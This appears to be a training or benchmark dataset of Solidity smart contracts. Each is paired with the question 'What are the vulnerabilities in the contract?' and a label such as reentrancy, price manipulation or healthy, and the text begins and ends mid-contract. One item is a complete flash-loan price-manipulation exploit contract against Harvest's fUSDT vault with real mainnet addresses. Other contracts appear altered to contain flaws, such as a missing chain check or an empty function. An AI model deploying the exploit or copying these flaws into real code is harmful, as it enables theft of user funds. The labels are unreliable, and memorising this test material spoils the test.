667             depositDetails.depositTokens = 0;
668             depositDetails.is_finished = true;
669             totalGymnetLocked -= depositDetails.depositTokens;
670             if(depositDetails.stakePeriod == 0) {
671                 totalGymnetUnlocked -= depositDetails.depositTokens;
672             }
673         }

674         user.totalDepositDollarValue = 0;
675         user.totalDepositTokens = 0;

676     }
677     function burnOldTokens() public onlyOwner {
678         uint256 _bal = IERC20Upgradeable(tokenAddress).balanceOf(address(this));
679         IERC20Burnable(tokenAddress).burnFrom(address(this),_bal);
680     }
681 }
What are the vulnerabilities in the contract?
incorrect ownership/visibility
<end of text>
1 pragma solidity ^0.6.0;


2 interface IUniswapV2Pair {
3     function swap(
4         uint256 amount0Out,
5         uint256 amount1Out,
6         address to,
7         bytes calldata data
8     ) external;
9 }

10 interface IUniswapV2Callee {
11     function uniswapV2Call(
12         address sender,
13         uint256 amount0,
14         uint256 amount1,
15         bytes calldata data
16     ) external;
17 }

18 interface ICurve {
19     function exchange_underlying(
20         int128 i,
21         int128 j,
22         uint256 dx,
23         uint256 min_dy
24     ) external;
25 }

26 interface IERC20 {
27     function balanceOf(address account) external view returns (uint256);

28     function transfer(address recipient, uint256 amount)
29         external
30         returns (bool);

31     function approve(address spender, uint256 amount) external returns (bool);

32     function transferFrom(
33         address sender,
34         address recipient,
35         uint256 amount
36     ) external returns (bool);
37 }

38 interface IUSDT {
39     function approve(address _spender, uint256 _value) external;

40     function transfer(address _to, uint256 _value) external;
41 }

42 interface IFarm {
43     function deposit(uint256) external;

44     function withdraw(uint256) external;
45 }

46 contract HarvestExploit is IUniswapV2Callee {
47     address USDT_WETH = 0x0d4a11d5EEaaC28EC3F61d100daF4d40471f1852;
48     address USDT = 0xdAC17F958D2ee523a2206206994597C13D831ec7;
49     address USDC = 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48;
50     address ySwap = 0x45F783CCE6B7FF23B2ab2D70e416cdb7D6055f51;
51     address fUSDT = 0x053c80eA73Dc6941F518a68E2FC52Ac45BDE7c9C;

52     function exploit() external {
53         IUniswapV2Pair(USDT_WETH).swap(
54             0,
55             50_000_000 * 1e6,
56             address(this),
57             abi.encode(1)
58         );
59     }

60     function uniswapV2Call(
61         address sender,
62         uint256 amount0,
63         uint256 amount1,
64         bytes calldata data
65     ) external override {
66         console.log(
67             "Amount of USDT received",
68             IERC20(USDT).balanceOf(address(this))
69         );
70         IUSDT(USDT).approve(address(ySwap), 2**256 - 1);
71         IUSDT(USDT).approve(address(fUSDT), 2**256 - 1);
72         IERC20(fUSDT).approve(address(fUSDT), 2**256 - 1);
73         IERC20(USDC).approve(address(ySwap), 2**256 - 1);

74         for (uint256 i = 0; i < 4; i++) {
75             uint256 usdcAmount = IERC20(USDC).balanceOf(address(this));
76             console.log("USDC in contract", usdcAmount);

77             ICurve(ySwap).exchange_underlying(1, 2, usdcAmount, 0);
78             console.log(
79                 "USDT balance after swap",
80                 IERC20(USDT).balanceOf(address(this))
81             );

82             uint256 slip = (IERC20(USDT).balanceOf(address(this)) * 5) / 1000;

83             IFarm(fUSDT).deposit(IERC20(USDT).balanceOf(address(this)) - slip);

84             uint256 fUSDTShares = IERC20(fUSDT).balanceOf(address(this));

85             console.log("deposited", fUSDTShares);

86             ICurve(ySwap).exchange_underlying(
87                 2,
88                 1,
89                 IERC20(USDT).balanceOf(address(this)),
90                 0
91             );

92             IFarm(fUSDT).withdraw(fUSDTShares);

93             console.log(
94                 "USDT after withdraw",
95                 IERC20(USDT).balanceOf(address(this))
96             );
97             console.log(
98                 "USDC after withdraw",
99                 IERC20(USDC).balanceOf(address(this))
100             );
101         }

102         uint256 returnAmountFee = (amount1 * 1000) / 997 + 1;
103         IUSDT(USDT).transfer(USDT_WETH, returnAmountFee);
104         console.log("Flashloan Return Amount", returnAmountFee);
105     }
106 }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1 // SPDX-License-Identifier: BSD-3-Clause
2 pragma solidity ^0.8.10;

3 import "./ComptrollerInterface.sol";
4 import "./CTokenInterfaces.sol";
5 import "./ErrorReporter.sol";
6 import "./EIP20Interface.sol";
7 import "./InterestRateModel.sol";
8 import "./ExponentialNoError.sol";

9 /**
10  * @title Compound's CToken Contract
11  * @notice Abstract base for CTokens
12  * @author Compound
13  */
14 abstract contract CToken is CTokenInterface, ExponentialNoError, TokenErrorReporter {
15     /**
16      * @notice Initialize the money market
17      * @param comptroller_ The address of the Comptroller
18      * @param interestRateModel_ The address of the interest rate model
19      * @param initialExchangeRateMantissa_ The initial exchange rate, scaled by 1e18
20      * @param name_ EIP-20 name of this token
21      * @param symbol_ EIP-20 symbol of this token
22      * @param decimals_ EIP-20 decimal precision of this token
23      */
24     function initialize(ComptrollerInterface comptroller_,
25                         InterestRateModel interestRateModel_,
26                         uint initialExchangeRateMantissa_,
27                         string memory name_,
28                         string memory symbol_,
29                         uint8 decimals_) public {
30         require(msg.sender == admin, "only admin may initialize the market");
31         require(accrualBlockNumber == 0 && borrowIndex == 0, "market may only be initialized once");

32         // Set initial exchange rate
33         initialExchangeRateMantissa = initialExchangeRateMantissa_;
34         require(initialExchangeRateMantissa > 0, "initial exchange rate must be greater than zero.");

35         // Set the comptroller
36         uint err = _setComptroller(comptroller_);
37         require(err == NO_ERROR, "setting comptroller failed");

38         // Initialize block number and borrow index (block number mocks depend on comptroller being set)
39         accrualBlockNumber = getBlockNumber();
40         borrowIndex = mantissaOne;

41         // Set the interest rate model (depends on block number / borrow index)
42         err = _setInterestRateModelFresh(interestRateModel_);
43         require(err == NO_ERROR, "setting interest rate model failed");

44         name = name_;
45         symbol = symbol_;
46         decimals = decimals_;

47         // The counter starts true to prevent changing it from zero to non-zero (i.e. smaller cost/refund)
48         _notEntered = true;
49     }

50     /**
51      * @notice Transfer `tokens` tokens from `src` to `dst` by `spender`
52      * @dev Called by both `transfer` and `transferFrom` internally
53      * @param spender The address of the account performing the transfer
54      * @param src The address of the source account
55      * @param dst The address of the destination account
56      * @param tokens The number of tokens to transfer
57      * @return 0 if the transfer succeeded, else revert
58      */
59     function transferTokens(address spender, address src, address dst, uint tokens) internal returns (uint) {
60         /* Fail if transfer not allowed */
61         uint allowed = comptroller.transferAllowed(address(this), src, dst, tokens);
62         if (allowed != 0) {
63             revert TransferComptrollerRejection(allowed);
64         }

65         /* Do not allow self-transfers */
66         if (src == dst) {
67             revert TransferNotAllowed();
68         }

69         /* Get the allowance, infinite for the account owner */
70         uint startingAllowance = 0;
71         if (spender == src) {
72             startingAllowance = type(uint).max;
73         } else {
74             startingAllowance = transferAllowances[src][spender];
75         }

76         /* Do the calculations, checking for {under,over}flow */
77         uint allowanceNew = startingAllowance - tokens;
78         uint srcTokensNew = accountTokens[src] - tokens;
79         uint dstTokensNew = accountTokens[dst] + tokens;

80         /////////////////////////
81         // EFFECTS & INTERACTIONS
82         // (No safe failures beyond this point)

83         accountTokens[src] = srcTokensNew;
84         accountTokens[dst] = dstTokensNew;

85         /* Eat some of the allowance (if necessary) */
86         if (startingAllowance != type(uint).max) {
87             transferAllowances[src][spender] = allowanceNew;
88         }

89         /* We emit a Transfer event */
90         emit Transfer(src, dst, tokens);

91         // unused function
92         // comptroller.transferVerify(address(this), src, dst, tokens);

93         return NO_ERROR;
94     }

95     /**
96      * @notice Transfer `amount` tokens from `msg.sender` to `dst`
97      * @param dst The address of the destination account
98      * @param amount The number of tokens to transfer
99      * @return Whether or not the transfer succeeded
100      */
101     function transfer(address dst, uint256 amount) override external returns (bool) {
102         return transferTokens(msg.sender, msg.sender, dst, amount) == NO_ERROR;
103     }

104     /**
105      * @notice Transfer `amount` tokens from `src` to `dst`
106      * @param src The address of the source account
107      * @param dst The address of the destination account
108      * @param amount The number of tokens to transfer
109      * @return Whether or not the transfer succeeded
110      */
111     function transferFrom(address src, address dst, uint256 amount) override external returns (bool) {
112         return transferTokens(msg.sender, src, dst, amount) == NO_ERROR;
113     }

114     /**
115      * @notice Approve `spender` to transfer up to `amount` from `src`
116      * @dev This will overwrite the approval amount for `spender`
117      *  and is subject to issues noted [here](https://eips.ethereum.org/EIPS/eip-20#approve)
118      * @param spender The address of the account which may transfer tokens
119      * @param amount The number of tokens that are approved (uint256.max means infinite)
120      * @return Whether or not the approval succeeded
121      */
122     function approve(address spender, uint256 amount) override external returns (bool) {
123         address src = msg.sender;
124         transferAllowances[src][spender] = amount;
125         emit Approval(src, spender, amount);
126         return true;
127     }
128     /**
129      * @notice Returns the current total borrows plus accrued interest
130      * @return The total borrows with interest
  
131     /*** Safe Token ***/

132     /**
133      * @notice Gets balance of this contract in terms of the underlying
134      * @dev This excludes the value of the current message, if any
135      * @return The quantity of underlying owned by this contract
136      */
137     function getCashPrior() virtual internal view returns (uint);

138     /**
139      * @dev Performs a transfer in, reverting upon failure. Returns the amount actually transferred to the protocol, in case of a fee.
140      *  This may revert due to insufficient balance or insufficient allowance.
141      */
142     function doTransferIn(address from, uint amount) virtual internal returns (uint);

143     /**
144      * @dev Performs a transfer out, ideally returning an explanatory error code upon failure rather than reverting.
145      *  If caller has not called checked protocol's balance, may revert due to insufficient cash held in the contract.
146      *  If caller has checked protocol's balance, and verified it is >= amount, this should not revert in normal conditions.
147      */
148     function doTransferOut(address payable to, uint amount) virtual internal;

149 }
What are the vulnerabilities in the contract?
reentrancy
<end of text>
1 // SPDX-License-Identifier: UNLICENSED
2 pragma solidity =0.8.7;

3 import "./interfaces/ICollateral.sol";
4 import "./interfaces/IStrategyController.sol";
5 import "./interfaces/IHook.sol";
6 import "@openzeppelin/contracts-upgradeable/token/ERC20/ERC20Upgradeable.sol";
7 import "@openzeppelin/contracts-upgradeable/token/ERC20/IERC20Upgradeable.sol";
8 import "@openzeppelin/contracts-upgradeable/token/ERC20/utils/SafeERC20Upgradeable.sol";
9 import "@openzeppelin/contracts-upgradeable/access/OwnableUpgradeable.sol";
10 import "@openzeppelin/contracts-upgradeable/security/ReentrancyGuardUpgradeable.sol";

11 contract Collateral is
12     ICollateral,
13     ERC20Upgradeable,
14     OwnableUpgradeable,
15     ReentrancyGuardUpgradeable
16 {
17     using SafeERC20Upgradeable for IERC20Upgradeable;

18     bool private _depositsAllowed;
19     bool private _withdrawalsAllowed;
20     address private _treasury;
21     uint256 private _mintingFee;
22     uint256 private _redemptionFee;
23     IERC20Upgradeable private _baseToken;
24     IStrategyController private _strategyController;

25     uint256 private _delayedWithdrawalExpiry;
26     mapping(address => WithdrawalRequest) private _accountToWithdrawalRequest;

27     IHook private _depositHook;
28     IHook private _withdrawHook;

29     uint256 private constant FEE_DENOMINATOR = 1000000;
30     uint256 private constant FEE_LIMIT = 50000;

31     function initialize(address _newBaseToken, address _newTreasury)
32         public
33         initializer
34     {
35         __Ownable_init_unchained();
36         __ReentrancyGuard_init_unchained();
37         __ERC20_init_unchained(
38             string("prePO Collateral Token"),
39             string("preCT")
40         );
41         _baseToken = IERC20Upgradeable(_newBaseToken);
42         _treasury = _newTreasury;
43     }

44     function deposit(uint256 _amount)
45         external
46         override
47         nonReentrant
48         returns (uint256)
49     {
50         require(_depositsAllowed, "Deposits not allowed");
51         _baseToken.safeTransferFrom(msg.sender, address(this), _amount);
52         // Calculate fees and shares to mint including latent contract funds
53         uint256 _amountToDeposit = _baseToken.balanceOf(address(this));
54         // Record deposit before fee is taken
55         if (address(_depositHook) != address(0)) {
56             _depositHook.hook(msg.sender, _amount, _amountToDeposit);
57         }
58         /**
59          * Add 1 to avoid rounding to zero, only process deposit if user is
60          * depositing an amount large enough to pay a fee.
61          */
62         uint256 _fee = (_amountToDeposit * _mintingFee) / FEE_DENOMINATOR + 1;
63         require(_amountToDeposit > _fee, "Deposit amount too small");
64         _baseToken.safeTransfer(_treasury, _fee);
65         _amountToDeposit -= _fee;

66         uint256 _valueBefore = _strategyController.totalValue();
67         _baseToken.approve(address(_strategyController), _amountToDeposit);
68         _strategyController.deposit(_amountToDeposit);
69         uint256 _valueAfter = _strategyController.totalValue();
70         _amountToDeposit = _valueAfter - _valueBefore;

71         uint256 _shares = 0;
72         if (totalSupply() == 0) {
73             _shares = _amountToDeposit;
74         } else {
75             /**
76              * # of shares owed = amount deposited / cost per share, cost per
77              * share = total supply / total value.
78              */
79             _shares = (_amountToDeposit * totalSupply()) / (_valueBefore);
80         }
81         _mint(msg.sender, _shares);
82         return _shares;
83     }

84     function initiateWithdrawal(uint256 _amount) external override {
85         /**
86          * Checking the balance before initiation is necessary since a user
87          * could initiate an unlimited withdrawal amount ahead of time,
88          * negating the protection a delayed withdrawal offers.
89          */
90         require(balanceOf(msg.sender) >= _amount, "Insufficient balance");
91         _accountToWithdrawalRequest[msg.sender].amount = _amount;
92         _accountToWithdrawalRequest[msg.sender].blockNumber = block.number;
93     }

94     function uninitiateWithdrawal() external override {
95         _accountToWithdrawalRequest[msg.sender].amount = 0;
96         _accountToWithdrawalRequest[msg.sender].blockNumber = 0;
97     }

98     function _processDelayedWithdrawal(address _account, uint256 _amount)
99         internal
100     {
101         /**
102          * Verify that the withdrawal being processed matches what was
103          * recorded during initiation.
104          */
105         require(
106             _accountToWithdrawalRequest[_account].amount == _amount,
107             "Initiated amount does not match"
108         );
109         uint256 _recordedBlock = _accountToWithdrawalRequest[_account]
110             .blockNumber;
111         require(
112             _recordedBlock + _delayedWithdrawalExpiry >= block.number,
113             "Must withdraw before expiry"
114         );
115         require(
116             block.number > _recordedBlock,
117             "Must withdraw in a later block"
118         );
119         // Reset the initiation prior to withdrawal.
120         _accountToWithdrawalRequest[_account].amount = 0;
121         _accountToWithdrawalRequest[_account].blockNumber = 0;
122     }

123     function withdraw(uint256 _amount)
124         external
125         override
126         nonReentrant
127         returns (uint256)
128     {
129         require(_withdrawalsAllowed, "Withdrawals not allowed");
130         if (_delayedWithdrawalExpiry != 0) {
131             _processDelayedWithdrawal(msg.sender, _amount);
132         }
133         uint256 _owed = (_strategyController.totalValue() * _amount) /
134             totalSupply();
135         _burn(msg.sender, _amount);

136         uint256 _balanceBefore = _baseToken.balanceOf(address(this));
137         _strategyController.withdraw(address(this), _owed);
138         uint256 _balanceAfter = _baseToken.balanceOf(address(this));

139         uint256 _amountWithdrawn = _balanceAfter - _balanceBefore;
140         // Record withdrawal before fee is taken
141         if (address(_withdrawHook) != address(0)) {
142             _withdrawHook.hook(msg.sender, _amount, _amountWithdrawn);
143         }

144         /**
145          * Send redemption fee to the protocol treasury. Add 1 to avoid
146          * rounding to zero, only process withdrawal if user is
147          * withdrawing an amount large enough to pay a fee.
148          */
149         uint256 _fee = (_amountWithdrawn * _redemptionFee) /
150             FEE_DENOMINATOR +
151             1;
152         require(_amountWithdrawn > _fee, "Withdrawal amount too small");
153         _baseToken.safeTransfer(_treasury, _fee);
154         _amountWithdrawn -= _fee;
155         _baseToken.safeTransfer(msg.sender, _amountWithdrawn);
156         return _amountWithdrawn;
157     }

158     function setDepositsAllowed(bool _allowed) external override onlyOwner {
159         _depositsAllowed = _allowed;
160         emit DepositsAllowedChanged(_allowed);
161     }

162     function setWithdrawalsAllowed(bool _allowed) external override onlyOwner {
163         _withdrawalsAllowed = _allowed;
164         emit WithdrawalsAllowedChanged(_allowed);
165     }

166     function setStrategyController(IStrategyController _newStrategyController)
167         external
168         override
169         onlyOwner
170     {
171         _strategyController = _newStrategyController;
172         emit StrategyControllerChanged(address(_strategyController));
173     }

174     function setDelayedWithdrawalExpiry(uint256 _newDelayedWithdrawalExpiry)
175         external
176         override
177         onlyOwner
178     {
179         _delayedWithdrawalExpiry = _newDelayedWithdrawalExpiry;
180         emit DelayedWithdrawalExpiryChanged(_delayedWithdrawalExpiry);
181     }

182     function setMintingFee(uint256 _newMintingFee)
183         external
184         override
185         onlyOwner
186     {
187         require(_newMintingFee <= FEE_LIMIT, "Exceeds fee limit");
188         _mintingFee = _newMintingFee;
189         emit MintingFeeChanged(_mintingFee);
190     }

191     function setRedemptionFee(uint256 _newRedemptionFee)
192         external
193         override
194         onlyOwner
195     {
196         require(_newRedemptionFee <= FEE_LIMIT, "Exceeds fee limit");
197         _redemptionFee = _newRedemptionFee;
198         emit RedemptionFeeChanged(_redemptionFee);
199     }

200     function setDepositHook(IHook _newDepositHook)
201         external
202         override
203         onlyOwner
204     {
205         _depositHook = _newDepositHook;
206         emit DepositHookChanged(address(_depositHook));
207     }

208     function setWithdrawHook(IHook _newWithdrawHook)
209         external
210         override
211         onlyOwner
212     {
213         _withdrawHook = _newWithdrawHook;
214         emit WithdrawHookChanged(address(_withdrawHook));
215     }

216     function getDepositsAllowed() external view override returns (bool) {
217         return _depositsAllowed;
218     }

219     function getWithdrawalsAllowed() external view override returns (bool) {
220         return _withdrawalsAllowed;
221     }

222     function getTreasury() external view override returns (address) {
223         return _treasury;
224     }

225     function getMintingFee() external view override returns (uint256) {
226         return _mintingFee;
227     }

228     function getRedemptionFee() external view override returns (uint256) {
229         return _redemptionFee;
230     }

231     function getBaseToken()
232         external
233         view
234         override
235         returns (IERC20Upgradeable)
236     {
237         return _baseToken;
238     }

239     function getStrategyController()
240         external
241         view
242         override
243         returns (IStrategyController)
244     {
245         return _strategyController;
246     }

247     function getDelayedWithdrawalExpiry()
248         external
249         view
250         override
251         returns (uint256)
252     {
253         return _delayedWithdrawalExpiry;
254     }

255     function getWithdrawalRequest(address _account)
256         external
257         view
258         override
259         returns (WithdrawalRequest memory)
260     {
261         return _accountToWithdrawalRequest[_account];
262     }

263     function getDepositHook() external view override returns (IHook) {
264         return _depositHook;
265     }

266     function getWithdrawHook() external view override returns (IHook) {
267         return _withdrawHook;
268     }

269     function getAmountForShares(uint256 _shares)
270         external
271         view
272         override
273         returns (uint256)
274     {
275         if (totalSupply() == 0) {
276             return _shares;
277         }
278         return (_shares * totalAssets()) / totalSupply();
279     }

280     function getSharesForAmount(uint256 _amount)
281         external
282         view
283         override
284         returns (uint256)
285     {
286         uint256 _totalAssets = totalAssets();
287     }

288     function getFeeDenominator() external pure override returns (uint256) {
289         return FEE_DENOMINATOR;
290     }

291     function getFeeLimit() external pure override returns (uint256) {
292         return FEE_LIMIT;
293     }

294     function totalAssets() public view override returns (uint256) {
295         return
296             _baseToken.balanceOf(address(this)) +
297             _strategyController.totalValue();
298     }
299 }

What are the vulnerabilities in the contract?
business logic flaw;
ether leakage; 
<end of text>
1 // SPDX-License-Identifier: MIT
2 pragma solidity ^0.8.7;

3 import { ILiFi } from "../Interfaces/ILiFi.sol";
4 import { LibAsset, IERC20 } from "../Libraries/LibAsset.sol";
5 import "./Swapper.sol";

6 /**
7  * @title Generic Swap Facet
8  * @author Li.Finance (https://li.finance)
9  * @notice Provides functionality for swapping through ANY DEX
10  * @dev Uses calldata to execute arbitrary methods on DEXs
11  */
12 contract GenericSwapFacet is ILiFi, Swapper {
13     /* ========== Public Functions ========== */

14     /**
15      * @notice Performs a swap and that's it
16      * @param _lifiData data used purely for tracking and analytics
17      * @param _swapData an array of swap related data for performing swaps before bridging
18      */
19     function swapTokensGeneric(LiFiData memory _lifiData, LibSwap.SwapData[] calldata _swapData) public payable {
20         uint256 receivingAssetIdBalance = LibAsset.getOwnBalance(_lifiData.receivingAssetId);

21         // Swap
22         _executeSwaps(_lifiData, _swapData);

23         uint256 postSwapBalance = LibAsset.getOwnBalance(_lifiData.receivingAssetId) - receivingAssetIdBalance;

24         LibAsset.transferAsset(_lifiData.receivingAssetId, payable(msg.sender), postSwapBalance);

25         emit LiFiTransferStarted(
26             _lifiData.transactionId,
27             _lifiData.integrator,
28             _lifiData.referrer,
29             _lifiData.sendingAssetId,
30             _lifiData.receivingAssetId,
31             _lifiData.receiver,
32             _lifiData.amount,
33             _lifiData.destinationChainId,
34             block.timestamp
35         );
36     }
37 }
What are the vulnerabilities in the contract?
ether leakage;
business logic flaw; 
<end of text>
1 // SPDX-License-Identifier: MIT
2 pragma solidity ^0.8.7;

3 import { ILiFi } from "../Interfaces/ILiFi.sol";
4 import { IAnyswapRouter } from "../Interfaces/IAnyswapRouter.sol";
5 import { LibDiamond } from "../Libraries/LibDiamond.sol";
6 import { LibAsset, IERC20 } from "../Libraries/LibAsset.sol";
7 import { IAnyswapToken } from "../Interfaces/IAnyswapToken.sol";
8 import { LibDiamond } from "../Libraries/LibDiamond.sol";
9 import "./Swapper.sol";

10 /**
11  * @title Anyswap Facet
12  * @author Li.Finance (https://li.finance)
13  * @notice Provides functionality for bridging through Multichain (Prev. AnySwap)
14  */
15 contract AnyswapFacet is ILiFi, Swapper {
16     /* ========== Types ========== */

17     struct AnyswapData {
18         address token;
19         address router;
20         uint256 amount;
21         address recipient;
22         uint256 toChainId;
23     }

24     /* ========== Public Bridge Functions ========== */

25     /**
26      * @notice Bridges tokens via Anyswap
27      * @param _lifiData data used purely for tracking and analytics
28      * @param _anyswapData data specific to Anyswap
29      */
30     function startBridgeTokensViaAnyswap(LiFiData memory _lifiData, AnyswapData calldata _anyswapData) public payable {
31         address underlyingToken = IAnyswapToken(_anyswapData.token).underlying();
32         if (_anyswapData.token != address(0) && underlyingToken != IAnyswapRouter(_anyswapData.router).wNATIVE()) {
33             if (underlyingToken == address(0)) {
34                 underlyingToken = _anyswapData.token;
35             }

36             uint256 _fromTokenBalance = LibAsset.getOwnBalance(underlyingToken);
37             LibAsset.transferFromERC20(underlyingToken, msg.sender, address(this), _anyswapData.amount);

38             require(
39                 LibAsset.getOwnBalance(underlyingToken) - _fromTokenBalance == _anyswapData.amount,
40                 "ERR_INVALID_AMOUNT"
41             );
42         } else {
43             require(msg.value == _anyswapData.amount, "ERR_INVALID_AMOUNT");
44         }

45         _startBridge(_anyswapData);

46         emit LiFiTransferStarted(
47             _lifiData.transactionId,
48             _lifiData.integrator,
49             _lifiData.referrer,
50             _lifiData.sendingAssetId,
51             _lifiData.receivingAssetId,
52             _lifiData.receiver,
53             _lifiData.amount,
54             _lifiData.destinationChainId,
55             block.timestamp
56         );
57     }

58     /**
59      * @notice Performs a swap before bridging via Anyswap
60      * @param _lifiData data used purely for tracking and analytics
61      * @param _swapData an array of swap related data for performing swaps before bridging
62      * @param _anyswapData data specific to Anyswap
63      */
64     function swapAndStartBridgeTokensViaAnyswap(
65         LiFiData memory _lifiData,
66         LibSwap.SwapData[] calldata _swapData,
67         AnyswapData memory _anyswapData
68     ) public payable {
69         address underlyingToken = IAnyswapToken(_anyswapData.token).underlying();
70         if (_anyswapData.token != address(0) && underlyingToken != IAnyswapRouter(_anyswapData.router).wNATIVE()) {
71             if (underlyingToken == address(0)) {
72                 underlyingToken = _anyswapData.token;
73             }

74             uint256 _fromTokenBalance = LibAsset.getOwnBalance(underlyingToken);

75             // Swap
76             _executeSwaps(_lifiData, _swapData);

77             uint256 _postSwapBalance = LibAsset.getOwnBalance(underlyingToken) - _fromTokenBalance;

78             require(_postSwapBalance > 0, "ERR_INVALID_AMOUNT");

79             _anyswapData.amount = _postSwapBalance;
80         } else {
81             uint256 _fromBalance = address(this).balance;

82             // Swap
83             _executeSwaps(_lifiData, _swapData);

84             require(address(this).balance - _fromBalance >= _anyswapData.amount, "ERR_INVALID_AMOUNT");

85             uint256 _postSwapBalance = address(this).balance - _fromBalance;

86             require(_postSwapBalance > 0, "ERR_INVALID_AMOUNT");

87             _anyswapData.amount = _postSwapBalance;
88         }

89         _startBridge(_anyswapData);

90         emit LiFiTransferStarted(
91             _lifiData.transactionId,
92             _lifiData.integrator,
93             _lifiData.referrer,
94             _lifiData.sendingAssetId,
95             _lifiData.receivingAssetId,
96             _lifiData.receiver,
97             _lifiData.amount,
98             _lifiData.destinationChainId,
99             block.timestamp
100         );
101     }

102     /* ========== Internal Functions ========== */

103     /**
104      * @dev Conatains the business logic for the bridge via Anyswap
105      * @param _anyswapData data specific to Anyswap
106      */
107     function _startBridge(AnyswapData memory _anyswapData) internal {
108         // Check chain id
109         require(block.chainid != _anyswapData.toChainId, "Cannot bridge to the same network.");
110         address underlyingToken = IAnyswapToken(_anyswapData.token).underlying();

111         if (underlyingToken == IAnyswapRouter(_anyswapData.router).wNATIVE()) {
112             IAnyswapRouter(_anyswapData.router).anySwapOutNative{ value: _anyswapData.amount }(
113                 _anyswapData.token,
114                 _anyswapData.recipient,
115                 _anyswapData.toChainId
116             );
117             return;
118         }

119         if (_anyswapData.token != address(0)) {
120             // Has underlying token?
121             if (underlyingToken != address(0)) {
122                 // Give Anyswap approval to bridge tokens
123                 LibAsset.approveERC20(IERC20(underlyingToken), _anyswapData.router, _anyswapData.amount);

124                 IAnyswapRouter(_anyswapData.router).anySwapOutUnderlying(
125                     _anyswapData.token,
126                     _anyswapData.recipient,
127                     _anyswapData.amount,
128                     _anyswapData.toChainId
129                 );
130             } else {
131                 // Give Anyswap approval to bridge tokens
132                 LibAsset.approveERC20(IERC20(_anyswapData.token), _anyswapData.router, _anyswapData.amount);

133                 IAnyswapRouter(_anyswapData.router).anySwapOut(
134                     _anyswapData.token,
135                     _anyswapData.recipient,
136                     _anyswapData.amount,
137                     _anyswapData.toChainId
138                 );
139             }
140         }
141     }
142 }
What are the vulnerabilities in the contract?
healthy
<end of text>
1 // SPDX-License-Identifier: MIT
2 pragma solidity ^0.8.7;

3 import { ILiFi } from "../Interfaces/ILiFi.sol";
4 import { IAnyswapRouter } from "../Interfaces/IAnyswapRouter.sol";
5 import { LibDiamond } from "../Libraries/LibDiamond.sol";
6 import { LibAsset, IERC20 } from "../Libraries/LibAsset.sol";
7 import { IAnyswapToken } from "../Interfaces/IAnyswapToken.sol";
8 import { LibDiamond } from "../Libraries/LibDiamond.sol";
9 import "./Swapper.sol";

10 /**
11  * @title Anyswap Facet
12  * @author Li.Finance (https://li.finance)
13  * @notice Provides functionality for bridging through Multichain (Prev. AnySwap)
14  */
15 contract AnyswapFacet is ILiFi, Swapper {
16     /* ========== Types ========== */

17     struct AnyswapData {
18         address token;
19         address router;
20         uint256 amount;
21         address recipient;
22         uint256 toChainId;
23     }

24     /* ========== Public Bridge Functions ========== */

25     /**
26      * @notice Bridges tokens via Anyswap
27      * @param _lifiData data used purely for tracking and analytics
28      * @param _anyswapData data specific to Anyswap
29      */
30     function startBridgeTokensViaAnyswap(LiFiData memory _lifiData, AnyswapData calldata _anyswapData) public payable {
31         address underlyingToken = IAnyswapToken(_anyswapData.token).underlying();
32         if (_anyswapData.token != address(0) && underlyingToken != IAnyswapRouter(_anyswapData.router).wNATIVE()) {
33             if (underlyingToken == address(0)) {
34                 underlyingToken = _anyswapData.token;
35             }

36             uint256 _fromTokenBalance = LibAsset.getOwnBalance(underlyingToken);
37             LibAsset.transferFromERC20(underlyingToken, msg.sender, address(this), _anyswapData.amount);

38             require(
39                 LibAsset.getOwnBalance(underlyingToken) - _fromTokenBalance == _anyswapData.amount,
40                 "ERR_INVALID_AMOUNT"
41             );
42         } else {
43             require(msg.value == _anyswapData.amount, "ERR_INVALID_AMOUNT");
44         }

45         _startBridge(_anyswapData);

46         emit LiFiTransferStarted(
47             _lifiData.transactionId,
48             _lifiData.integrator,
49             _lifiData.referrer,
50             _lifiData.sendingAssetId,
51             _lifiData.receivingAssetId,
52             _lifiData.receiver,
53             _lifiData.amount,
54             _lifiData.destinationChainId,
55             block.timestamp
56         );
57     }

58     /**
59      * @notice Performs a swap before bridging via Anyswap
60      * @param _lifiData data used purely for tracking and analytics
61      * @param _swapData an array of swap related data for performing swaps before bridging
62      * @param _anyswapData data specific to Anyswap
63      */
64     function swapAndStartBridgeTokensViaAnyswap(
65         LiFiData memory _lifiData,
66         LibSwap.SwapData[] calldata _swapData,
67         AnyswapData memory _anyswapData
68     ) public payable {
69         address underlyingToken = IAnyswapToken(_anyswapData.token).underlying();
70         if (_anyswapData.token != address(0) && underlyingToken != IAnyswapRouter(_anyswapData.router).wNATIVE()) {
71             if (underlyingToken == address(0)) {
72                 underlyingToken = _anyswapData.token;
73             }

74             uint256 _fromTokenBalance = LibAsset.getOwnBalance(underlyingToken);

75             // Swap
76             _executeSwaps(_lifiData, _swapData);

77             uint256 _postSwapBalance = LibAsset.getOwnBalance(underlyingToken) - _fromTokenBalance;

78             require(_postSwapBalance > 0, "ERR_INVALID_AMOUNT");

79             _anyswapData.amount = _postSwapBalance;
80         } else {
81             uint256 _fromBalance = address(this).balance;

82             // Swap
83             _executeSwaps(_lifiData, _swapData);

84             require(address(this).balance - _fromBalance >= _anyswapData.amount, "ERR_INVALID_AMOUNT");

85             uint256 _postSwapBalance = address(this).balance - _fromBalance;

86             require(_postSwapBalance > 0, "ERR_INVALID_AMOUNT");

87             _anyswapData.amount = _postSwapBalance;
88         }

89         _startBridge(_anyswapData);

90         emit LiFiTransferStarted(
91             _lifiData.transactionId,
92             _lifiData.integrator,
93             _lifiData.referrer,
94             _lifiData.sendingAssetId,
95             _lifiData.receivingAssetId,
96             _lifiData.receiver,
97             _lifiData.amount,
98             _lifiData.destinationChainId,
99             block.timestamp
100         );
101     }

102     /* ========== Internal Functions ========== */

103     /**
104      * @dev Conatains the business logic for the bridge via Anyswap
105      * @param _anyswapData data specific to Anyswap
106      */
107     function _startBridge(AnyswapData memory _anyswapData) internal {
108         // Check chain id
109         address underlyingToken = IAnyswapToken(_anyswapData.token).underlying();

110         if (underlyingToken == IAnyswapRouter(_anyswapData.router).wNATIVE()) {
111             IAnyswapRouter(_anyswapData.router).anySwapOutNative{ value: _anyswapData.amount }(
112                 _anyswapData.token,
113                 _anyswapData.recipient,
114                 _anyswapData.toChainId
115             );
116             return;
117         }

118         if (_anyswapData.token != address(0)) {
119             // Has underlying token?
120             if (underlyingToken != address(0)) {
121                 // Give Anyswap approval to bridge tokens
122                 LibAsset.approveERC20(IERC20(underlyingToken), _anyswapData.router, _anyswapData.amount);

123                 IAnyswapRouter(_anyswapData.router).anySwapOutUnderlying(
124                     _anyswapData.token,
125                     _anyswapData.recipient,
126                     _anyswapData.amount,
